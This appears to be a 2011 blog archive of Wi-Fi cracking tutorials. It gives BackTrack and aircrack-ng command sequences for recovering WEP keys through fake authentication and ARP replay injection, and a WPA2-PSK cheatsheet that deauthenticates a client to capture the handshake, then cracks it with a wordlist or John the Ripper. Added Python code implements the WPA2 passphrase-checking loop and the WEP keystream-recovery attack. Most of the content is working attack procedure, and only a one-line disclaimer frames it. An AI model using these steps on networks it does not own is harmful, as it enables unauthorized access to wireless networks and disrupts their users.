Showing posts with label wep cracking. Show all posts

Thursday, 27 October 2011

Wep Cracking

A. SCOPE
 
This tutorial is intended for users with little or no experience with Linux or Wi-Fi. It aims to guide you through the process of using the BackTrack live CD and its wireless tools effectively.
 
B. OVERVIEW
 
BACKTRACK is a bootable live CD with a myriad of wireless and TCP/IP networking tools. This tutorial covers only the included Kismet and the aircrack-ng suite of tools.
 
Tools Overview
  • Kismet – a wireless network detector and packet sniffer; starting it also puts the adapter into monitor mode
  • airmon-ng – a tool that puts your wireless adapter into monitor mode (rfmon)
  • airodump-ng – a tool for capturing packets from a wireless router (otherwise known as an AP) and writing them to disk
  • aireplay-ng – a tool for injecting frames; used here for fake authentication and for replaying captured ARP requests so the AP keeps producing freshly encrypted packets (new IVs)
  • aircrack-ng – a tool for recovering WEP keys. It does not "decrypt" the key; it computes it statistically from a large number of captured IVs
  • iwconfig – a tool for configuring wireless adapters. You can use this to confirm that your wireless adapter is in "monitor" mode, which is essential for capturing raw frames and injecting the fake ARP requests at the target router
  • macchanger – a tool that allows you to view and/or spoof (fake) your MAC address
 
Glossary of Terms
  • AP: Access Point: a wireless router
  • MAC Address: Media Access Control address, a unique ID assigned to every network interface, wireless adapters and routers included. It is written in hexadecimal (e.g. 00:11:ef:22:a3:6a)
  • BSSID: the Access Point's MAC address
  • ESSID: the Access Point's broadcast name (e.g. linksys, default, belkin). Some APs will not broadcast their name, but Kismet may still be able to detect it from the probe and association frames of connecting clients
  • TERMINAL: MS-DOS-like command line interface. You can open this by clicking the black box icon next to the start key in BackTrack
  • WEP: short for Wired Equivalent Privacy, the original (and broken) security protocol for Wi-Fi networks
  • WPA: short for Wi-Fi Protected Access, a more secure protocol than WEP for wireless networks. NOTE: this tutorial does not cover cracking WPA encryption

Since BackTrack is a live CD running off your CD-ROM, there is nowhere that you can write files to unless you have a Linux partition on your hard drive or a USB storage device. BackTrack has some NTFS support, so you will be able to browse to your Windows-based hard drive should you have one, but it will mount the partition as "read-only". I dual boot Windows and Ubuntu on my laptop, so I already have a Linux swap partition and a reiserfs partition. BackTrack had no problem detecting these and mounting them for me. To find your hard drive or USB storage device, just browse to the /mnt folder in the file manager. Typically a hard drive will appear named something like hda1 or hda2 if you have more than one partition on the drive. Alternately hdb1 could show if you have more than one hard disk. Having somewhere to write files that you can access in case you need to reboot makes the whole process a little easier.
 
C. DISCLAIMER
Hacking into someone’s wireless network without permission is probably against the law. I wouldn’t recommend doing it. I didn’t break into anyone else’s network while learning how to do this.
 
STEP 1 :
  Monitoring Wireless Traffic With Kismet (this also puts the wireless adapter into monitor mode)
Once KDE is up and running, start Kismet by clicking on the start key and browsing to Backtrack -> Wireless Tools -> Analyzers -> Kismet.
Specify the wireless interface, e.g. wlan0.
Note the following in a text editor; steps 2 to 5 need all three:
  • the broadcast name (ESSID), also called SSID; in our case it is ITMIS
  • the MAC address (BSSID), i.e. the MAC of the AP's radio interface
  • the channel number
  Leave Kismet running to keep your wireless adapter in monitor mode.
 
STEP 2
Collecting Data With Airodump
Lock airodump-ng to the channel and BSSID you noted in step 1 (if it keeps hopping channels it will miss most of the traffic you inject later) and save only the captured IVs:
airodump-ng --ivs --channel <channel from step 1> --bssid 00:11:22:33:44:55 -w /root/Desktop/ITMIS_RCU wlan0
Use the interface that is actually in monitor mode (wlan0 here; mac80211 drivers create a separate mon0 instead). airodump-ng appends a sequence number to the prefix, so the output file will be /root/Desktop/ITMIS_RCU-01.ivs. Leave this running for the remaining steps.
 
STEP 3
Associate your wireless card with the AP you are attacking (fake authentication). Without an association the AP silently drops the frames you inject in step 4.
aireplay-ng -1 0 -e ITMIS -a 00:11:22:33:44:55 -h 00:fe:22:33:f4:e5 wlan0
-e: ESSID of the AP
-a: MAC of the AP (BSSID)
-h: MAC of wlan0 (your laptop). If the AP filters by MAC, use macchanger to give wlan0 the MAC of a client Kismet has already seen
Wait for "Association successful :-)" in the output before moving on.
 
STEP 4
Start packet injection with aireplay-ng (ARP request replay). It waits for an ARP request from the network, then re-injects it over and over; the AP answers each copy with a freshly encrypted frame, so the #Data column in airodump-ng should start climbing quickly.
aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:fe:22:33:f4:e5 wlan0
 
STEP 5
Recovering the WEP Key with Aircrack
Find the IVS file airodump-ng wrote in step 2 (the prefix you gave plus -01). Then type in a terminal:
aircrack-ng -s /root/Desktop/ITMIS_RCU-01.ivs
(-s prints the key in ASCII as well as hex.) If aircrack-ng reports that it failed and will retry with more IVs, leave steps 2 and 4 running and run it again later; it re-reads the growing file each time.

Sunday, 23 October 2011

WEP / WPA Cracking Unleashed (wifi cracking)


Cheatsheet : Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper
Basic steps :
  • Put interface in monitor mode
  • Find wireless network (protected with WPA2 and a Pre Shared Key)
  • Capture all packets
  • Wait until you see a client and deauthenticate the client, so the handshake can be captured
  • Crack the key using a dictionary file (or via John The Ripper)
I’ll use a Dlink DWL-G122 (USB) wireless network interface for this procedure. In backtrack4, this device is recognized as wlan0.

First, put the card in monitor mode :
root@bt:~# airmon-ng

Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0)
ath1            Atheros         madwifi-ng VAP (parent: wifi0)
wlan0           Ralink 2573 USB rt73usb - [phy0]


root@bt:~# airmon-ng start wlan0

Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0)
ath1            Atheros         madwifi-ng VAP (parent: wifi0)
wlan0           Ralink 2573 USB rt73usb - [phy0]
                                (monitor mode enabled on mon0)

Ok, we can now use interface mon0

Let’s find a wireless network that uses WPA2 / PSK :

root@bt:~# airodump-ng mon0

 CH  6 ][ Elapsed: 4 s ][ 2009-02-21 12:57                                         

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                   

 00:19:5B:52:AD:F7  -33        5        0    0  10  54   WPA2 CCMP   PSK  TestNet                                                  

 BSSID              STATION            PWR   Rate   Lost  Packets  Probe                                                           

 00:19:5B:52:AD:F7  00:1C:BF:90:5B:A3  -29   0- 1     12        4  TestNet

Stop airodump-ng and run it again, writing all packets to disk :

airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2

At this point, you have 2 options : either wait until a client connects and the 4-way handshake is complete, or deauthenticate an existing client and thus force it to reassociate. Time is money, so let's force the deauthentication. We need the BSSID of the AP (-a) and the MAC of a connected client (-c):

root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0

13:04:19  Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10

13:04:20  Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]

As a result, airodump-ng should indicate “WPA Handshake:” in the upper right corner

 CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7                                        

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                               

 00:19:5B:52:AD:F7  -33 100     1338       99    0  10  54   WPA2 CCMP   PSK  TestNet                                             

 BSSID              STATION            PWR   Rate   Lost  Packets  Probe                                                          

 00:19:5B:52:AD:F7  00:1C:BF:90:5B:A3  -27  54-54      0      230

Stop airodump-ng and make sure the files were created properly

root@bt:/# ls /tmp/wpa2* -al
-rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap
-rw-r--r-- 1 root root   476 2009-02-21 13:04 /tmp/wpa2-01.csv
-rw-r--r-- 1 root root   590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv

From this point forward, you do not need to be anywhere near the wireless network. All cracking happens offline, so you can stop airodump and other processes and even walk away from the AP. In fact, I would suggest to walk away and find yourself a cosy place where you can live, eat, sleep, etc….

Cracking a WPA2 PSK key is offline guessing: every candidate passphrase is run through PBKDF2 (4096 rounds of HMAC-SHA1, salted with the SSID) and the result is checked against the MIC in the captured handshake, so it can take a very very long time. There are 2 ways of guessing : one that is relatively fast but does not guarantee success (a wordlist) and one that is very slow, but guarantees that you will find the key at some point in time (exhaustive brute force).

The first option is by using a wordlist/dictionary file. A lot of these files can be found on the internet (e.g. www.theargon.com or on packetstorm (see the archives)), or can be generated with tools such as John The Ripper. Once the wordlist is created, all you need to do is run aircrack-ng with the wordlist and feed it the .cap file that contains the WPA2 handshake.

So if your wordlist is called word.lst (under /tmp/wordlists), you can run

aircrack-ng -w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap

The success of cracking the WPA2 PSK key is directly linked to the quality of your wordlist. In other words, you may get lucky and get the key very fast, or you may not get the key at all.
The second method (brute force) is guaranteed to succeed, but it may take ages to complete. Keep in mind that a WPA2 passphrase can be anything from 8 to 63 printable ASCII characters (or the PSK itself given as 64 hex digits), so in theory you would have to build every password combination from all possible character sets and feed them into aircrack-ng. If you want to use John The Ripper to generate all possible password combinations and pipe them into aircrack-ng, this is the command to use :

root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap

(Note : the PSK in my testlab is only 8 characters, contains one uppercase character and 4 numbers). I will post the output when the key was cracked, including the time it required to crack the key.
That’s it

Update : after 20 hours of cracking, the key still has not been found. The system I'm using to crack the keys is not very fast, but let's look at some facts :
8 characters, plain characters (lowercase and uppercase) or digits = each character in the key could have 26+26+10 (62) possible values. So the maximum number of combinations that need to be checked in the brute-force process is 62^8 = 218 340 105 584 896. At about 600 keys per second on my "slow" system, it could take more than 101 083 382 hours (11 539 years) to find the key. I have stopped the cracking process as my machine is way too slow to crack the key while I'm still alive… So think about this when doing a WPA2 PSK audit.
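What aircrack-ng actually computes for every entry of the wordlist, written out as an added Python example (this is not code from the page or from the aircrack-ng project): the PMK via PBKDF2-HMAC-SHA1 salted with the SSID, the PTK via the 802.11 PRF-512 over both MAC addresses and both nonces, and the EAPOL MIC (HMAC-SHA1 truncated to 16 bytes, which is what WPA2/CCMP with the PSK AKM uses) compared against the MIC captured in message 2 of the handshake. The SSID and the two MAC addresses are taken from the airodump-ng output above; the nonces, the "true" passphrase and the wordlist are constructed for the demo, and the handshake message is built by the code itself playing the client. The 4096-iteration PBKDF2 step is the reason the key rate above is measured in hundreds per second rather than millions.

```python
"""WPA2-PSK handshake check, as aircrack-ng performs it per wordlist entry.
Added example: not code from the page or from the aircrack-ng project.
"""
import hashlib
import hmac

SSID = "TestNet"                              # ESSID from the airodump-ng output on the page
AP_MAC = bytes.fromhex("00195B52ADF7")        # BSSID from the page
STA_MAC = bytes.fromhex("001CBF905BA3")       # client station from the page
# Nonces and passphrase are CONSTRUCTED for this example, not captured anywhere.
ANONCE = bytes(range(0x10, 0x30))
SNONCE = bytes(range(0xA0, 0xC0))
TRUE_PSK = "Summer2009"


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    These 4096 HMAC rounds per guess are what make WPA2-PSK cracking slow."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, cut to 64 bytes."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK for the PSK AKM (SHA1-based PRF); the SHA-256 AKMs use a different KDF."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk, b"Pairwise key expansion", data)


def build_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Minimal EAPOL-Key message 2 (client -> AP) carrying no key data.
    Layout: 802.1X hdr (4) | descr type (1) | key info (2) | key len (2) | replay ctr (8)
            | nonce (32) | IV (16) | RSC (8) | ID (8) | MIC (16) | key data len (2)"""
    body = (
        b"\x02"                         # descriptor type: RSN
        + (0x010A).to_bytes(2, "big")   # key info: version 2 (HMAC-SHA1), pairwise, MIC present
        + b"\x00\x00"                   # key length (0 in message 2)
        + (1).to_bytes(8, "big")        # replay counter
        + snonce
        + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # IV, RSC, key ID: unused here
        + mic
        + b"\x00\x00"                   # key data length
    )
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """MIC over the whole EAPOL frame with its MIC field (bytes 81..96) zeroed."""
    zeroed = eapol[:81] + b"\x00" * 16 + eapol[97:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack_psk(wordlist, ssid, ap_mac, sta_mac, anonce, snonce, eapol_msg2):
    """Return the passphrase whose recomputed MIC matches the captured one, else None."""
    captured_mic = eapol_msg2[81:97]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]   # KCK = PTK[0:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_msg2), captured_mic):
            return candidate
    return None


def make_handshake_msg2(passphrase: str) -> bytes:
    """Play the client: produce message 2 with the MIC a real station would compute."""
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return build_msg2(SNONCE, eapol_mic(kck, build_msg2(SNONCE)))


def demo(wordlist=("password", "linksys", "Summer2009", "TestNet1")):
    """Constructed handshake plus a tiny wordlist: returns the recovered PSK or None."""
    msg2 = make_handshake_msg2(TRUE_PSK)
    return crack_psk(wordlist, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, msg2)


if __name__ == "__main__":
    print("recovered PSK:", demo())
```

Swapping the wordlist for a generator (for example one reading john --stdout from a pipe) turns demo() into the same loop as the aircrack-ng command above; the cost per candidate is dominated by pmk_from_passphrase, which is why rainbow tables only help for a fixed SSID.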


WEP Cracking
1.       ifconfig wlan0 up
2.       airmon-ng start wlan0
3.       airodump-ng mon0 (to list the APs and stations and choose the desired one)
4.       airodump-ng --channel (e.g. 11) --bssid (MAC of AP) -w (path and filename prefix for the dump) mon0
5.       aireplay-ng -3 -b (MAC of AP) -h (MAC of Station) mon0 (to increase traffic; using the MAC of a station that is already associated means no fake authentication step is needed)
6.       aircrack-ng -b (MAC of AP) (path of dump files with *.cap)
DONE!
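Why both WEP procedures on this page (the step-by-step post above and this cheatsheet) revolve around collecting IVs and forcing ARP traffic, as an added Python example that is not code from the page or from aircrack-ng: WEP encrypts each frame with RC4 keyed by a 24-bit IV, sent in the clear, prepended to the shared key, so the keystream is fixed per IV and there are only 2^24 of them. An ARP frame has a predictable first 16 bytes (the LLC/SNAP header plus the fixed ARP fields), which yields the keystream for that IV without knowing the key, and any other frame that reuses the IV can then be decrypted. That IV/keystream pair is what the .ivs capture and the replayed ARP requests feed to aircrack-ng. The 40-bit key, the IV and the two frame payloads are constructed for the demo; the station MAC is the one from the page.

```python
"""WEP per-packet RC4 keystream recovery and IV reuse.
Added example: not code from the page or from the aircrack-ng project.
"""
import zlib

WEP_KEY = bytes.fromhex("0badc0ffee")             # CONSTRUCTED 40-bit WEP key
SNAP_ARP = bytes.fromhex("aaaa030000000806")      # LLC/SNAP header of every ARP frame
SNAP_IP = bytes.fromhex("aaaa030000000800")       # LLC/SNAP header of every IPv4 frame
ARP_FIXED = bytes.fromhex("0001080006040001")     # htype=1, ptype=IPv4, hlen=6, plen=4, op=request
KNOWN_ARP_PREFIX = SNAP_ARP + ARP_FIXED           # 16 bytes an attacker knows without the key

STA_MAC = bytes.fromhex("001cbf905ba3")           # station MAC from the page
# Constructed plaintexts: an ARP request and an IPv4/TCP frame from the same station.
ARP_PLAINTEXT = (KNOWN_ARP_PREFIX + STA_MAC + bytes([192, 168, 1, 10])
                 + b"\x00" * 6 + bytes([192, 168, 1, 1]))
IP_PLAINTEXT = (SNAP_IP + bytes.fromhex("45000034abcd40004006") + b"\x00" * 10
                + b"GET / HTTP/1.0\r\n")


def rc4(key: bytes, length: int) -> bytes:
    """Plain RC4: KSA followed by `length` bytes of PRGA output."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes, key_id: int = 0) -> bytes:
    """Frame body = IV(3) | key id(1) | RC4(IV || key)(plaintext || CRC32 ICV)."""
    icv = zlib.crc32(plaintext).to_bytes(4, "little")
    return iv + bytes([key_id]) + xor(plaintext + icv, rc4(iv + key, len(plaintext) + 4))


def wep_decrypt(key: bytes, frame: bytes) -> bytes:
    """Legitimate receiver: strip IV/key id, decrypt, verify the ICV."""
    iv, body = frame[:3], frame[4:]
    plain = xor(body, rc4(iv + key, len(body)))
    data, icv = plain[:-4], plain[-4:]
    if zlib.crc32(data).to_bytes(4, "little") != icv:
        raise ValueError("bad ICV")
    return data


def keystream_from_known_plaintext(frame: bytes, known: bytes):
    """Attacker: IV and the first len(known) keystream bytes, no key needed.
    This (IV, keystream) pair is what an airodump-ng .ivs entry records."""
    return frame[:3], xor(frame[4:4 + len(known)], known)


def decrypt_prefix(frame: bytes, table: dict):
    """Decrypt as much of a frame as the keystream table for its IV allows."""
    ks = table.get(frame[:3])
    return None if ks is None else xor(frame[4:4 + len(ks)], ks)


def demo() -> bytes:
    """AP reuses IV 1a2b3c for an ARP reply and an unrelated IP frame: recover the latter's prefix."""
    iv = bytes.fromhex("1a2b3c")
    arp_frame = wep_encrypt(WEP_KEY, iv, ARP_PLAINTEXT)
    ip_frame = wep_encrypt(WEP_KEY, iv, IP_PLAINTEXT)
    table = dict([keystream_from_known_plaintext(arp_frame, KNOWN_ARP_PREFIX)])
    return decrypt_prefix(ip_frame, table)


if __name__ == "__main__":
    print("recovered prefix of the IP frame:", demo().hex())
```

Replaying one ARP request with aireplay-ng -3 makes the AP re-encrypt its reply under a new IV each time, so the table in demo() grows by one entry per injected frame; aircrack-ng's statistical attacks take those IV/keystream pairs and work back to the shared key itself rather than decrypting frame by frame.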